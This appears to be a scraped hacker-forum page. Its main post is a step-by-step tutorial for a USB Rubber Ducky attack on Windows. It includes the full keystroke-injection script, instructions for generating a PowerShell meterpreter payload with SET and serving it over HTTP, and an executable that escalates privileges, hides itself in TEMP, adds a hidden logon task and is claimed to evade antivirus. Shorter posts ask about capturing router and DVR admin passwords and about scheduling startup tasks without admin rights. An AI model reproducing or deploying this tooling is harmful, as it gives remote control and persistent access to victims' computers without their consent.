Search the Community

Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!

In the process of setting up 2 machines for my little ones and I want to make sure they don't "accidentally" stumble upon something they shouldn't. I have parental controls and content filtering inside the router which works well, but I'm wanting to have a separate network for just the kids and I want everything on that network to be restricted to appropriate content only. Should I setup a proxy and point their browser's to route traffic through a proxy, is there a web filter app/server software you recommend? OpenDNS works well, but if I remember right I was able to somewhat view content that should have been blocked. The only thing I really want fully open is YouTube. Thanks in advance. I'm open to all suggestions, the more enterprise the better.

hello Is it possible to get "admin" password of a dvr like "evil twin" used in wifi password ? just a idea. Any suggestions, thanks

Hi all, I have myself a stack of various routers; an old BT Hub 2, Hub 6, an original TALKTALK router, some random router that looks like it's from the 90's (I forget the model), etc. People give me their old stuff to play with because they know I'm a massive nerd in my spare time Pentesting the router password hash is easy enough with Aircrack, however I can't find much information about how one goes about capturing the admin password hash of a router (or plain text, if it's old and crappy like the random router I suspect may be!) So a basic question; What tools / methods are used for capturing admin router passwords? I plan on having a play with each router over the weekend. I did an online search for information, but the search just yielded lots of rubbish news articles with no actual useful information. Thanks guys.

Hi all, I'm going to be doing the Red Hat System Admin I course soon, with the mind to follow up with the second course and then the RHCSA certification. Just wondered if anyone here had done these courses? Any tips / experiences / comments? Thank you

hello Hak5 forums users, I'm currently using dual TP-link USB wireless cards for airbase-ng rouge karma AP / airodump-ng / MDK3 with BRCTL and dhclient to enable internet access for network auditing. I've been looking into a wifi pineapple as an upgrade to this eclectic setup. As I understand from defcon talks / wiki, the Nano enables an access point after setup for administration over wifi. If I am exclusively using the Nano using the USB ethernet connection to my laptop, can the administration AP be disabled? What interface of the two onboard radios does that AP run on? Does the Nano feature / offer USB 3.0 for operation? Thanks , dr_deconstruct

I'm trying to schedule a startup application with schtasks on a Windows 7 box. I get Access Denied. schtasks works without administrator privileges if you are setting it for specfic time of day but not with startup tasks. Is there a tricksy way to schedule startup tasks on Windows 7 and later without being admin?

Hi Guys I just want to know what tools and technics are you guys using as windows admin to tackel everyday works loads iin your enviroment and what recommendation that you have for me a person who is new at windows administration work. Tools for local and admin (Troubleshooting locally on PC) Tools for remote admin Tools for monitoring user activity on PC Tools for Network monitory and others And yes can you guys provide some cool tools for helping making life easy with AD(Active Direcotry). my understanding of AD is very low as i have just started to work in an enterprise enviroment i am introduced to this windows NOS. If anyone is so kind to help with a few more information on AD and some tools to help make my life easy that will be so great. cant wait for the feedback